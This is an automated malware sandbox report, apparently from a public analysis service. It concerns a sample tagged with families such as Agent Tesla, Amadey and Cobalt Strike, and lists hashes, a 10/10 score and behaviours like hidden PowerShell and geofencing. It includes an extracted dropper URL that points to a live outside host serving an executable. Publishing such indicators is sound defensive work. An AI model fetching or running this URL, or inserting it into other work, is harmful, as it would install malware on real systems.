General

  • Target

    2025-07-02_dce86a2457eda216c8e6ee129149e4a4_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer

  • Size

    938KB

  • Sample

    250702-xkl36aaj2z

  • MD5

    dce86a2457eda216c8e6ee129149e4a4

  • SHA1

    47c1672677fe2135770a91d61b46b8670410e6fa

  • SHA256

    eff7894d88308fbbc98576ebb0968b015f3e9d8bb9b4ab1bf965ac70fa699cc9

  • SHA512

    729dd1975e7d0b49a7fea740d558115fb89a62815701597d164771ee2749063534e0fd8e5d4bb5dfb01ae53e5d1b232a34cf0f3bb2ae7ca71ac6c5b19289ba23

  • SSDEEP

    24576:6qDEvCTbMWu7rQYlBQcBiT6rprG8a9VE:6TvC/MTQYxsWR7a9V

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.156.72.2/testmine/random.exe

Targets

    • Target

      2025-07-02_dce86a2457eda216c8e6ee129149e4a4_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer

    • Size

      938KB

    • MD5

      dce86a2457eda216c8e6ee129149e4a4

    • SHA1

      47c1672677fe2135770a91d61b46b8670410e6fa

    • SHA256

      eff7894d88308fbbc98576ebb0968b015f3e9d8bb9b4ab1bf965ac70fa699cc9

    • SHA512

      729dd1975e7d0b49a7fea740d558115fb89a62815701597d164771ee2749063534e0fd8e5d4bb5dfb01ae53e5d1b232a34cf0f3bb2ae7ca71ac6c5b19289ba23

    • SSDEEP

      24576:6qDEvCTbMWu7rQYlBQcBiT6rprG8a9VE:6TvC/MTQYxsWR7a9V

    Score
    10/10
    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

MITRE ATT&CK Enterprise v16

Tasks